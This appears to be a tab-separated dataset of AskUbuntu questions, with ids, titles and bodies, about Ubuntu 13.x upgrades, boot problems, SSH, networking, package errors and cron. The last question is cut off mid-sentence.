360266	old kernel in 13.10	i 've just upgraded from 13.04 to 13.10 . i 've read in some articles that ubuntu 13.10 is supposed to have the linux 3.11 kernel . however the output uname -a states that my kernel is still at 3.9 : linux joren-8570w 3.9.0-030900-generic # 201304291257 smp mon apr 29 16:58:15 utc 2013 x86_64 x86_64 x86_64 gnu/linux do i have to upgrade my kernel manually , or should this have happened / will happen in the future with the ubuntu upgrade ? edit : the output of aptitude search linux | grep ^i i libselinux1 - selinux runtime shared libraries i libselinux1 : i386 - selinux runtime shared libraries i linux-firmware - firmware for linux kernel drivers i a linux-headers-3.11.0-12 - header files related to linux kernel versi i a linux-headers-3.11.0-12-generic - linux kernel headers for version 3.11.0 on i linux-headers-3.11.4-031104 - header files related to linux kernel versi i linux-headers-3.11.4-031104-gen - linux kernel headers for version 3.11.4 on i linux-headers-3.9.0-030900 - header files related to linux kernel versi i linux-headers-3.9.0-030900-gene - linux kernel headers for version 3.9.0 on i linux-headers-generic - generic linux kernel headers i linux-image-3.9.0-030900-generi - linux kernel image for version 3.9.0 on 64 i linux-libc-dev - linux kernel headers for development i linux-sound-base - base package for alsa and oss sound system i pptp-linux - point-to-point tunneling protocol ( pptp ) c i syslinux - collection of boot loaders i syslinux-common - collection of boot loaders ( common files ) i syslinux-legacy - bootloader for linux/i386 using ms-dos flo i util-linux - miscellaneous system utilities
360267	how to make synergy work , from windows ( as server ) to ubuntu ( as slave )	i have synergy 1.4.12 on my windows8 desktop and can not get my ubuntu laptop to become a slave to it in order to use one mouse and keyboard between my desktop ( windows ) and laptop ( ubuntu ) . thanks
360268	how to configure a ssh server to use a certain public key ?	i have a dual boot windows 7 / ubuntu 12.04 desktop and i have installed openssh server in both ( using cygwin64 under windows ) . i connected from my laptop , running ubuntu 12.04 , to the cygwin64 openssh server , and an entry to ~/.ssh/known_hosts was normally added . now , i am trying to connect to ubuntu openssh server ( same ip , domain name ) and i get the error : warning : remote host identification has changed ! this is of course because the 2 servers running on different oses on the same machine have created different public keys and corresponding fingerprints . is there any way to synchronize them ( i.e . copy all the public key info from one to the other ) ?
360270	how to print a single image in the 4 corners of the paper ?	i have an image in tif format and i want to print 4 copies of the image , but the 4 have to be on the same paper . is there an option available for in ubuntu 12 ?
360271	graphics requirements	i wanted to upgrade from 12.04 to 13.10 but got a message that i should upgrade to 12.10 first . when i tried to upgrade to 12.10 i got a message that my graphics adapter was n't supported in 12.10 . i 'm currently using onboard video so i can add a pci or agp adapter but i do n't know what specs i need to be compatible with 12.10 and 13.10 . is there somewhere that these requirements are listed ?
360272	how to check why my static ip is n't working ?	i 'm using ubuntu 12.04 desktop edition . i 'm not overly familiar with the unix side , but i 'm learning . from a fresh install , i basically only installed xampp . my webserver now works fine ( although with dynamic ip ) . i 'm at a university , so the it office gave me a static ip and all the accompanying info to set it up . my subdomain with the university works ( although , ip dynamic ) in an attempt to apply static ip , i then modified my /etc/network/interfaces file to the effect of : auto lo eth0 iface lo inet loopback iface eth0 inet static address 192.168.1.101 netmask 255.255.255.0 gateway 192.168.1.1 this killed my network connection : i ca n't even ping the computer ( or ping any other systems from the computer ) . it seems pretty straightforward , but something obviously went wrong . i 'm not sure where to even begin debugging ?
360275	unity and other gui broken due to interrupted installation	general questions is this : how to troubleshoot and fix graphical user interface environments on ubuntu 13.04 if installation of one of environments was interrupted ( paused ) by either pressing ctrl+c or ctrl+z ? my actual case i use ubuntu 13.04 with default unity gui installed . recently , i was playing around with various environments , installing xfce , gnome and cinnamon . when i installed them , i could log to each environment from main log in screen and each one , including unity worked . after that , i was trying to install kde : sudo apt-get install kubuntu-desktop while it was installing and unpacking i noticed that free disk space is running out . i wanted to avoid messing something up , so i paused installing/unpacking process by pressing ctrl+z , because ctrl+c did n't work . after that i restarted system . when i opened ubuntu again all environments , including unity worked improperly : when switching to another work space , windows are blurred , multiplied and one on another file manager window looks like elements are combined from unity and kde i ca n't even do a screenshot to show a problem as screenshot capture selection of capture area : command line works like usual , so problem only affects gui . is there a way to troubleshoot it and fix at least unity without re-installing system ?
360282	where can i download ubuntu touch 1.0 ?	i remember that today will release the official version 1.0 , but where is it ?
360284	how do i change my display name on login ?	when installing ubuntu it asked me for a name . i entered it as name ( space ) lastname . now when i get to login screen , it greets me by that name . i want to change it , in fact to remove last name .
360285	13.10 on vaio pro with uefi	i tried to install ubuntu 13.10 on my vaio pro in uefi mode but it failed ( i.e . when i reboot , ubuntu is not detected ) . so i installed boot-repair in a live session and used the recommended repair ( here is the output of boot-repair http : //paste.ubuntu.com/6251374/ ) but nothing changed . do you have any idea to solve my problem ?
360287	can i upgrade ubuntu 10.10 to 13.10 ?	my os was left to 10.10 and i was unable to upgrade it to 11.04 . is there a way i can upgrade this to the latest version ( 13 ) ? thank you .
360289	sound recorder with `` record as '' list empty in 13.04	i tried today for the first time sound recorder , but the list `` record as '' is empty . does someone knows why ? is maybe some other problem i have with ubuntu since i upgraded to 13.04 ? is it going to be solved with 13.10 ?
360293	could not calculate the upgrade , what happened ?	i am running sudo update-manager -d and start the upgrade process . i select upgrade option and when then manager enters setting new software channels it throws an error . could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . i have disabled all unofficial and third party packages , i am not running a pre-release version since i am at 13.04 and i am trying to update to beta 2 which is not a pre-release . before i fill a bug report , since its happening to both of my systems i would like to figure out if anyone else had same issues . edit : added output for comment . sudo dpkg -l | grep -w `` rc '' rc google-chrome-beta 31.0.1650.16-1 amd64 the web browser from google ii sysv-rc 2.88dsf-13.10ubuntu15 all system-v-like runlevel change mechanism cat /etc/apt/sources.list deb http : //dk.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //dk.archive.ubuntu.com/ubuntu/ raring main restricted deb http : //dk.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //dk.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb http : //dk.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //dk.archive.ubuntu.com/ubuntu/ raring universe deb http : //dk.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //dk.archive.ubuntu.com/ubuntu/ raring-updates universe deb http : //dk.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //dk.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //dk.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //dk.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main deb http : //dk.archive.ubuntu.com/ubuntu/ raring-proposed multiverse universe restricted main lsb_release -c codename : raring sudo apt-get -y install aptitude & & sudo rename 's/\.list $ /.list.disable/ ' /etc/apt/sources.list.d/*.list & & sudo aptitude update & & aptitude search ' ? narrow ( ? installed , ! ? archive ( raring ) ) ' i dropbox - cloud synchronization engine - cli and nautilus extension i google-chrome-stable - the web browser from google i google-talkplugin - google talk plugin i libdrm-intel1 - userspace interface to intel-specific kernel drm services -- runtime i libdrm-nouveau2 - userspace interface to nouveau-specific kernel drm services -- runtime i libdrm-radeon1 - userspace interface to radeon-specific kernel drm services -- runtime i libdrm2 - userspace interface to kernel drm services -- runtime i libegl1-mesa - free implementation of the egl api -- runtime i libegl1-mesa-drivers - free implementation of the egl api -- hardware drivers i libgbm1 - generic buffer management api -- runtime i libgl1-mesa-dri - free implementation of the opengl api -- dri modules i libgl1-mesa-glx - free implementation of the opengl api -- glx runtime i libglapi-mesa - free implementation of the gl api -- shared library i a libgles2-mesa - free implementation of the opengl|es 2.x api -- runtime i libllvm3.3 - low-level virtual machine ( llvm ) , runtime library i libopenvg1-mesa - free implementation of the openvg api -- runtime i libxatracker1 - x acceleration library -- runtime i nodejs - node.js event-based server-side javascript engine id nvidia-persistenced - load the nvidia kernel driver and create device files id nvidia-settings-331 - tool for configuring the nvidia graphics driver i simplescreenrecorder - a feature-rich screen recorder that supports x11 and opengl . i a simplescreenrecorder-lib - a feature-rich screen recorder that supports x11 and opengl . i sublime-text - sublime text is a sophisticated text editor for code , markup and prose i vokoscreen - easy to use screencast creator i xserver-common - common files used by various x servers i xserver-xorg-core - xorg x server - core server i xserver-xorg-input-synaptics - synaptics touchpad driver for x.org server i xserver-xorg-video-ati - x.org x server -- amd/ati display driver wrapper i xserver-xorg-video-cirrus - x.org x server -- cirrus display driver i xserver-xorg-video-intel - x.org x server -- intel i8xx , i9xx display driver i xserver-xorg-video-mach64 - x.org x server -- ati mach64 display driver i xserver-xorg-video-nouveau - x.org x server -- nouveau display driver i xserver-xorg-video-r128 - x.org x server -- ati r128 display driver i xserver-xorg-video-radeon - x.org x server -- amd/ati radeon display driver i xserver-xorg-video-vmware - x.org x server -- vmware display driver
360295	install java on ubuntu server ( parallels plesk )	i want to install java to my server so i can use php shell_exec to compile java online . so i 'm trying to install java on my webserver ( ubuntu - parallels plesk ) . i logged in to the server with putty and tried some commands like : sudo apt-get install openjdk-6-jre or sudo apt-get install oracle-java7-installer but than i get error 's like : package drweb-bases must be reinstalled , but there can be no archive found . i tried to uninstall drweb-bases , reinstall , no matter what . i still get that error . what you i need to do ? i am doing it completly wrong ? am i not destroying my webserver ? there is not much to find on this topic on google .
360297	can i use ubuntu server to replace our windows environment ?	i have recently been put in charge of a network overhaul for our company . i have done plenty with ubuntu in school but it has been a few years . i would like to replace our current servers with ubuntu , although i am unaware if it will work . our current environment runs a domain , exchange , and vpn . i know there are solutions capable for this . i guess my man worry is will windows 7 and windows xp be able to use ubuntu as a domain controller ? if anyone has had success with this i would love some input . i have a meeting in a couple months that i am suppose to explain our plan . thank you .
360298	deleted directory does n't appear at the bin and does n't give the free space back	i 'm using kubuntu . my disk was full some days ago and the system requested me to delete files . i deleted a ~17gb directory , but it did n't appear at the bin and did n't released the space . what could be happening ? thanks ! df -h ~ $ df -h s. fitxers mida en ăşs lliure % ăs muntat a /dev/sda1 145g 131g 6,4g 96 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 985m 12k 985m 1 % /dev tmpfs 201m 880k 200m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 1001m 84k 1001m 1 % /run/shm none 100m 16k 100m 1 % /run/user
360299	windows 7 boot lost after install ubuntu 13.04	i had problem recently installing ubuntu 13.04 ( and some others distro with grub boot loader ) . i have a windows 7 partition ( i still need it ) and after install grub ( default versions for opensuse 13.2 and ubuntu 13.04 ) , in all of my attempts , i had lost the windows boot ( i got the message `` no system found '' after select the windows option ) . i got the same issue installing opensuse and ubuntu , but i got success installing fedora 19 . question 1 : is it a bug on the new grub versions ? question 2 : there are a way to fix it after install ubuntu ? ( and get windows boot working fine )
360302	ubuntu 12.04 fresh install wont boot up	im running ubuntu 12.04 and it refuses to boot up . the screen will come on for a second , the mosue will appear , then itll go black again all inside about 3 seconds . i let it just do that for a while and eventually a window popped up saying i had a display issue . i did n't have a mouse but there was a button saying `` ok '' at the bottom that i couldnt click on . i hit enter , got through that screen , now im looking at another that says `` what would you like to do ? '' - run in low-graphics mode for just one session - reconfigure graphics - troubleshoot the error - exit to console login then two buttons , cancel , and ok . i dont have a mouse and its not letting me navigate between these options with tab . firstly , if i make it through these windows will it get me into the computer so i can try and fix whats going on ? also , whats going on here ? also , how can i click on these buttons without the use of tab or a mouse ?
360303	combine multiple monitors into single desktop	running ubuntu 13.04 ati firepro 2460 i have 2 hd monitors that i 'd like to combine into a single long desktop ( ie 3840px x 1080px ) . not looking for 2 parallel desktops , i 've already removed mirroring from system settings . my intentions are to run a fullscreen app across 2 monitors , so i require a 'virtual ' monitor spanning across the 2 screens . is there a standard way of implementing this ?
360306	dpkg returns error 10 when processing package php5-common	i 'm having trouble installing php in 13.04 . seems like the package manager ca n't ( re ) configure the php package . i already tried purging every php* package , removing the cache files in /var/cache/aptbut and other solutions i 've found but nothing seems to work . here 's the error output : $ sudo dpkg -- debug=12 -- configure -a setting up php5-common ( 5.4.9-4ubuntu2.3 ) ... d000002 : fork/exec /var/lib/dpkg/info/php5-common.postinst ( configure ) dpkg : error processing php5-common ( -- configure ) : subprocess installed post-installation script returned error exit status 10 dpkg : dependency problems prevent configuration of php5-cli : php5-cli depends on php5-common ( = 5.4.9-4ubuntu2.3 ) ; however : package php5-common is not configured yet . dpkg : error processing php5-cli ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of php5-cgi : php5-cgi depends on php5-common ( = 5.4.9-4ubuntu2.3 ) ; however : package php5-common is not configured yet . dpkg : error processing php5-cgi ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of php5-fpm : php5-fpm depends on php5-common ( = 5.4.9-4ubuntu2.3 ) ; however : package php5-common is not configured yet . dpkg : error processing php5-fpm ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : php5-common php5-cli php5-cgi php5-fpm sudo apt-get install -f sudo apt-get install php5-common php5 they all return the same error . how can i fix this ?
360311	is a 1 gb sized usb stick big enough for ubuntu 13.10 live system ?	can i use a 1 gb usb stick for the ubuntu 13.10 release ? i ca n't find my 2gb stick , but i want it now : ) i did n't try it yet , because i 'm afraid i will screw up my laptop .
360315	can not ssh to ubuntu server - openssh server owner changed	i am using suphp with apache for virtual hosting but somewhere down the line my root ssh access is getting screwed up . i have n't been able to figure out why it is happening but eventually , my root user is not able to ssh to the server . i get this error : *** invalid open call : o_creat without mode *** : sshd : root @ pts/3 terminated ======= backtrace : ========= /lib/x86_64-linux-gnu/libc.so.6 ( __fortify_fail+0x37 ) [ 0x7f12fe871817 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0xeb7e1 ) [ 0x7f12fe8527e1 ] sshd : root @ pts/3 [ 0x41a542 ] sshd : root @ pts/3 [ 0x41a9eb ] sshd : root @ pts/3 [ 0x41aeb8 ] sshd : root @ pts/3 [ 0x409630 ] sshd : root @ pts/3 [ 0x40f9ed ] sshd : root @ pts/3 [ 0x410dd6 ] sshd : root @ pts/3 [ 0x411994 ] sshd : root @ pts/3 [ 0x411f16 ] sshd : root @ pts/3 [ 0x40b253 ] sshd : root @ pts/3 [ 0x42be24 ] sshd : root @ pts/3 [ 0x40c9cb ] sshd : root @ pts/3 [ 0x412199 ] sshd : root @ pts/3 [ 0x4061a2 ] /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xed ) [ 0x7f12fe78876d ] sshd : root @ pts/3 [ 0x407635 ] ======= memory map : ======== 00400000-00448000 r-xp 00000000 ca:02 4554758 /usr/sbin/sshd 00647000-00648000 r -- p 00047000 ca:02 4554758 /usr/sbin/sshd 00648000-00649000 rw-p 00048000 ca:02 4554758 /usr/sbin/sshd 00649000-00750000 rw-p 00000000 00:00 0 01794000-017b5000 rw-p 00000000 00:00 0 [ heap ] 7f12fd5ad000-7f12fd5c2000 r-xp 00000000 ca:02 3489844 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f12fd5c2000-7f12fd7c1000 -- -p 00015000 ca:02 3489844 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f12fd7c1000-7f12fd7c2000 r -- p 00014000 ca:02 3489844 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f12fd7c2000-7f12fd7c3000 rw-p 00015000 ca:02 3489844 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f12fd7c3000-7f12fd7db000 r-xp 00000000 ca:02 3489977 /lib/x86_64-linux-gnu/libresolv-2.15.so 7f12fd7db000-7f12fd9db000 -- -p 00018000 ca:02 3489977 /lib/x86_64-linux-gnu/libresolv-2.15.so 7f12fd9db000-7f12fd9dc000 r -- p 00018000 ca:02 3489977 /lib/x86_64-linux-gnu/libresolv-2.15.so 7f12fd9dc000-7f12fd9dd000 rw-p 00019000 ca:02 3489977 /lib/x86_64-linux-gnu/libresolv-2.15.so 7f12fd9dd000-7f12fd9df000 rw-p 00000000 00:00 0 7f12fd9df000-7f12fd9e6000 r-xp 00000000 ca:02 3489994 /lib/x86_64-linux-gnu/libnss_dns-2.15.so 7f12fd9e6000-7f12fdbe5000 -- -p 00007000 ca:02 3489994 /lib/x86_64-linux-gnu/libnss_dns-2.15.so 7f12fdbe5000-7f12fdbe6000 r -- p 00006000 ca:02 3489994 /lib/x86_64-linux-gnu/libnss_dns-2.15.so 7f12fdbe6000-7f12fdbe7000 rw-p 00007000 ca:02 3489994 /lib/x86_64-linux-gnu/libnss_dns-2.15.so 7f12fdbe7000-7f12fdd27000 rw-s 00000000 00:04 6167294 /dev/zero ( deleted ) 7f12fdd27000-7f12fdd33000 r-xp 00000000 ca:02 3489984 /lib/x86_64-linux-gnu/libnss_files-2.15.so 7f12fdd33000-7f12fdf32000 -- -p 0000c000 ca:02 3489984 /lib/x86_64-linux-gnu/libnss_files-2.15.so 7f12fdf32000-7f12fdf33000 r -- p 0000b000 ca:02 3489984 /lib/x86_64-linux-gnu/libnss_files-2.15.so 7f12fdf33000-7f12fdf34000 rw-p 0000c000 ca:02 3489984 /lib/x86_64-linux-gnu/libnss_files-2.15.so 7f12fdf34000-7f12fdf3e000 r-xp 00000000 ca:02 3489979 /lib/x86_64-linux-gnu/libnss_nis-2.15.so 7f12fdf3e000-7f12fe13e000 -- -p 0000a000 ca:02 3489979 /lib/x86_64-linux-gnu/libnss_nis-2.15.so 7f12fe13e000-7f12fe13f000 r -- p 0000a000 ca:02 3489979 /lib/x86_64-linux-gnu/libnss_nis-2.15.so 7f12fe13f000-7f12fe140000 rw-p 0000b000 ca:02 3489979 /lib/x86_64-linux-gnu/libnss_nis-2.15.so 7f12fe140000-7f12fe157000 r-xp 00000000 ca:02 3489996 /lib/x86_64-linux-gnu/libnsl-2.15.so 7f12fe157000-7f12fe356000 -- -p 00017000 ca:02 3489996 /lib/x86_64-linux-gnu/libnsl-2.15.so 7f12fe356000-7f12fe357000 r -- p 00016000 ca:02 3489996 /lib/x86_64-linux-gnu/libnsl-2.15.so 7f12fe357000-7f12fe358000 rw-p 00017000 ca:02 3489996 /lib/x86_64-linux-gnu/libnsl-2.15.so 7f12fe358000-7f12fe35a000 rw-p 00000000 00:00 0 7f12fe35a000-7f12fe362000 r-xp 00000000 ca:02 3489985 /lib/x86_64-linux-gnu/libnss_compat-2.15.so 7f12fe362000-7f12fe561000 -- -p 00008000 ca:02 3489985 /lib/x86_64-linux-gnu/libnss_compat-2.15.so 7f12fe561000-7f12fe562000 r -- p 00007000 ca:02 3489985 /lib/x86_64-linux-gnu/libnss_compat-2.15.so 7f12fe562000-7f12fe563000 rw-p 00008000 ca:02 3489985 /lib/x86_64-linux-gnu/libnss_compat-2.15.so 7f12fe563000-7f12fe565000 r-xp 00000000 ca:02 3489886 /lib/x86_64-linux-gnu/libdl-2.15.so 7f12fe565000-7f12fe765000 -- -p 00002000 ca:02 3489886 /lib/x86_64-linux-gnu/libdl-2.15.so 7f12fe765000-7f12fe766000 r -- p 00002000 ca:02 3489886 /lib/x86_64-linux-gnu/libdl-2.15.so 7f12fe766000-7f12fe767000 rw-p 00003000 ca:02 3489886 /lib/x86_64-linux-gnu/libdl-2.15.so 7f12fe767000-7f12fe91c000 r-xp 00000000 ca:02 3489888 /lib/x86_64-linux-gnu/libc-2.15.so 7f12fe91c000-7f12feb1b000 -- -p 001b5000 ca:02 3489888 /lib/x86_64-linux-gnu/libc-2.15.so 7f12feb1b000-7f12feb1f000 r -- p 001b4000 ca:02 3489888 /lib/x86_64-linux-gnu/libc-2.15.so 7f12feb1f000-7f12feb21000 rw-p 001b8000 ca:02 3489888 /lib/x86_64-linux-gnu/libc-2.15.so 7f12feb21000-7f12feb26000 rw-p 00000000 00:00 0 7f12feb26000-7f12feb2f000 r-xp 00000000 ca:02 3489983 /lib/x86_64-linux-gnu/libcrypt-2.15.so 7f12feb2f000-7f12fed2f000 -- -p 00009000 ca:02 3489983 /lib/x86_64-linux-gnu/libcrypt-2.15.so 7f12fed2f000-7f12fed30000 r -- p 00009000 ca:02 3489983 /lib/x86_64-linux-gnu/libcrypt-2.15.so 7f12fed30000-7f12fed31000 rw-p 0000a000 ca:02 3489983 /lib/x86_64-linux-gnu/libcrypt-2.15.so 7f12fed31000-7f12fed5f000 rw-p 00000000 00:00 0 7f12fed5f000-7f12fef10000 r-xp 00000000 ca:02 3489831 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 7f12fef10000-7f12ff110000 -- -p 001b1000 ca:02 3489831 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 7f12ff110000-7f12ff12b000 r -- p 001b1000 ca:02 3489831 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 7f12ff12b000-7f12ff136000 rw-p 001cc000 ca:02 3489831 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 7f12ff136000-7f12ff13a000 rw-p 00000000 00:00 0 7f12ff13a000-7f12ff150000 r-xp 00000000 ca:02 3490020 /lib/x86_64-linux-gnu/libz.so.1.2.3.4 7f12ff150000-7f12ff34f000 -- -p 00016000 ca:02 3490020 /lib/x86_64-linux-gnu/libz.so.1.2.3.4 7f12ff34f000-7f12ff350000 r -- p 00015000 ca:02 3490020 /lib/x86_64-linux-gnu/libz.so.1.2.3.4connection to stageserver.dockphp.com closed . after some debugging , i was able to narrow it down to a few things . for some reason the sshd daemon is running as root : www-data ( apache user ) instead of root . my ftp connection works but ssh over terminal fails . i have no idea whether it is getting caused due to suphp or not ( because that is the only place where user permission 's etc . change ) . i really need to narrow it down and fix it asap . thanks a lot !
360320	where have the keyboard layout options gone in ubuntu 13.10 ?	in ubuntu 13.04 it was possible to disable the caps lock key . it was also possible to make the key sequence ctrl - alt - backspace to kill the x-server . that was all done using system settings - > keyboard layout - > options . keyboard layout in 13.04 is called text entry in 13.10 . but the options are no longer available . where have they gone ?
360322	netbeans hangs on new project creation	when creating a new project in netbeans , it hangs on the creation screen ; i 'm running netbeans 7.0.1 on xubuntu 13.04 . java -version prints : java version `` 1.7.0_25 '' openjdk runtime environment ( icedtea 2.3.10 ) ( 7u25-2.3.10-1ubuntu0.13.04.2 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) /usr/lib/jvm/ contains the following folders ; java-1.5.0-gcj-4.7-amd64 java-6-openjdk-amd64 java-7-openjdk-common java-1.6.0-openjdk-amd64 java-6-openjdk-common java-1.7.0-openjdk-amd64 java-7-openjdk-amd64 i tried editing /usr/share/netbeans/7.0.1/etc/netbeans.conf with the following ( as was suggested in another post ) ; netbeans_jdkhome= '' /usr/lib/jvm/java-7-openjdk-amd64/jre/ '' but that did n't work . instead , netbeans then presented an error on the loading splash when it reached `` turning on modules ... '' claiming the jdk was missing . both netbeans and the openjdk java 7/6 runtimes were installed through the ubuntu software centre . i 've also tried uninstalling and reinstalling both java and netbeans . any help would be greatly appreciated , thanks !
360323	permission denied after creating home partition	i have recently created a separate home partition following this tutorial https : //help.ubuntu.com/community/partitioning/home/moving . since iâm still a newbie in the linux ( struggling to learn ) i felt happy when every thing seemed to work smooth . how ever , i realised after a while that i had lost all permission to my subfolders in the my home folder . i still can read/write the files placed directly in /home/magnus but i 'm denied access to any of the subfolders . i just realised one more disturbing thing , probably related to home-partition story above : when i try cd ~/music/ i get the message bash : cd : /home/magnus/music/ : permission denied when i try : sudo cd ~/music/ i get the result sudo : cd : command not found seems strange that the cd command have been lost ? what have i done wrong and is there a way to fix this ? btw : i use ubuntu 12.04 lts thanks for all the help ! magnus
360327	install ubuntu on usb + disk encryption	i want to create an operating system installed upon a usb instead hdd ( 4 gb ) so i wanted to know if there were any special steps for it or simply choosing usb in installation menu . p.s - i want to do full install and not live boot . and after that i want to encrypt the entire operating system using truecypt , guide already present on their website , i just wanted to know if it would be compatible with this method . thanks : )
360329	error : can not run c compiled programs . if you meant to cross compile use -- host ' ubuntu	i 'm completely new to ubuntu i downloaded and unpacked a tar.gz package , after extraction , it is said in its documentation : '' type ./configure -- disable-gts '' but when i run this command alone it tells me `` permission denied '' error . then i tried to use sh ./configure -- disable-gts instead , but this time i faced this error : > configure : error : can not run c compiled programs . if you meant to cross compile , use ` -- host ' . how can i overcome these two problems ? ( i mean permission and compile error ) i 'm just a rookie and i need urgent help .
360330	saucy upgrade keyboard problem	just upgraded and now my keyboard is n't working . i ca n't enter text in apps ( libreoffice , nav bar in firefox , emails in thunderbird , gedit , etc ) . but oddly i can enter text to log in , use the dash and into app dialogues . interestingly , the screen keyboard “onboard” suffers exactly the same way . must be something with my 13.04 config , as if i log on as ‘guest’ all is fine .
360332	ca n't get skype to shut up when signing off	i use ubuntu 12.04 and i do n't want skype to play a sound file each time i sign on , off , receive a text message , etc . so i made fitting settings in the options menu , and it works for everything except for `` skype logout '' . reinstalling did n't work . here are the things that i tried to do to shut it up : i unticked the box that says `` play sound file '' . at first it worked , but after i had restarted it played the sound file again . then i made an mp3 which had no sound in it and told skype to play that file . same thing . first it worked but as soon as i restarted , it made the sound again . 3rd thing i tried : i unticked the box that says `` enable event '' . same results . how can i fix this ?
360333	xubuntu freezes during boot after system upgrade	after updating to 13.10 system required reboot . but after that it freezes on starting ( on xubuntu logo ) . i tried switch to terminal , but it does n't work . i tried to load system with other kernel version ( 3.8.0-31 ) , but it freezes too . could you please provide any ideas what can be wrong ?
360334	i need advice about instaling ubuntu on phone	i own an lg p970 ( optimus black ) my question is if on my phone ia can install ubuntu . thanks
360335	cron not running scripts , no errors in /var/log/syslog	i have a script that creates a file in cron.d and puts some jobs in it . cron seems to not execute these jobs at all , since the program it runs is set to log all executions . the file inside cron.d looks something like this : shell=/bin/sh path=/sbin : /bin : /usr/sbin : /usr/bin */1 * * * * root /usr/bin/python /home/myname/some_script.py -- switch1 2 21 * * 4 root /usr/bin/python /home/myname/some_script.py -- switch2 -- switch3 neither of these jobs is executed and i ca n't find anything in grep cron /var/log/syslog . the scripts work fine when executed normally . any ideas ? edit : adding the line */1 * * * * root echo `` something '' > > /tmp/something works fine . note : though askubuntu wo n't show it , the file does have a trailing newline .
360336	how do i prevent being kicked back to the login screen every time ?	just finished upgrading from ubuntu 13.04 to 13.10 . everything works fine . after the installations , i restart to finish the installations . in the log in screen , i put my password and then it goes back to the log in screen . i 've tried so many times , still the same . note : using unity , running 13.04 before using macbook air with single os .
360341	how to switch from mir to surfaceflinger ?	because of this bug https : //bugs.launchpad.net/mir/+bug/1238695 ubuntu touch on the google nexus 7 ( grouper ) , touch randomly freezes , and flickers . it is bad enough that i can not do anything except restart the device . i was just wondering how to workaround this , can i switch back to the `` surfaceflinger '' that touch previously used - as this was working nicely on previous versions ?
360343	is upgrade from 13.04 to 13.10 lead to data loss ?	i want to know that if i upgrade my system from 13.04 to 13.10.is there any chance of data loss ( music , documents , video etc . ) after upgradation ?
360346	regenerating fonts cache never finishes	when i try to update or install something ( either via the software center or via apt-get update and then via sudo dpkg -- configure -a ) , ubuntu ( 13.04 ) starts to regenerate the fonts cache , and the corresponding /var/cache/fontconfig/ grows in size up to 2100 files with 4,2 mb . it stops at that point and doesnât grow any further , even if i leave my computer running for hours . apart from the standard ubuntu fonts i have installed exactly seven other fonts .
360356	why does n't the command do-release-upgrade does n't require sudo ?	i was wondering why the command do-release-upgrade does n't require sudo ? i mean , it does significantly change your system , so i would have guessed it requires sudo . this is from ubuntu self , but it is n't that helpful . i just want to know how this is secure for the integrity for my system , if every user can access this command . thanks in advance . [ edit ] : i used a new terminal window , thus no sudo that was n't expired yet , and i used the command do-release-upgrade not sudo do-release-upgrade.so even with unexpired sudo i should be unable to upgrade . [ edit 2 ] :
360358	13.10 startlubuntu command for x2go	with 13.04 and earlier x2go started up lubuntu with the command startlubuntu . this is gone from 13.10 and i tracked down that it was replaced by lxsession . however , if i try to start up my desktop with lxsession i just get a blank desktop . what is the proper command line replacement for startlubuntu ? update : xrdp has the same problem . i can tell lxde is running because the guake message shows up but there 's no desktop or anything else .
360360	cgminer installation	i just installed 13.10 on my satellite c855-12z ( which has amd radeon hd 7610m ) , i will use this laptop primarily for bitcoin mining with asics , because it uses less power than a regular pc . but here i run into a bit of a problem , when i tried to install cgminer apt wanted to uninstall amd graphic drivers and installed nvidia ones . how do i fix this ?
360361	upgrade to 13.10 from 13:04 fails with 403 forbidden	i have currently ubuntu 13.04 installed . i ran the updater and 13.10 was noted as an upgrade . after initiating the upgrade , this error message is returned and the upgrade process ends : 403 forbidden file type or location : http : //archive.ubuntu.com/ubuntu/dists/saucy/main/dist-upgrader-all/current/releaseannouncement.html ? lang=en_ca & os=ubuntu & ver=13.10 any ideas would be helpful .
360362	refind menu dual-boot into ubuntu issue	i 've just recently installed refind on my rmbp using this tutorial ( read : i 'm new to ubuntu/linux ) . i 've managed to get my machine to dual-boot into osx and ubuntu but i 'm having a strange problem with the menu for refind . when the menu comes up there is an option that lists a seemingly valid boot , listing that it is booting from `` efi\ubuntu\vmlinuz-3.8.0-19-generic '' ( with the ubuntu logo ) , but when i select this option i get a black screen with what i expect is kernel messages . this quickly stalls out with the error message : filesystem does n't have /sbin/init . however , the listing under the boot option here should be valid as i copied the required files ( as per the linked tutorial above ) to that location on my osx partition . is it possibly reading this file from my linux partition ? i am a bit confused here because of the presence of the forward slashes , could this be a drive formatting issue ? when i select the other option from the refind all it lists is `` boot linux for macintosh hd '' ( with the linux logo that is standard in the refind.config file . i am able to boot into ubuntu without issue , but here the file i am booting from is not listed . i suppose then my question is twofold : first 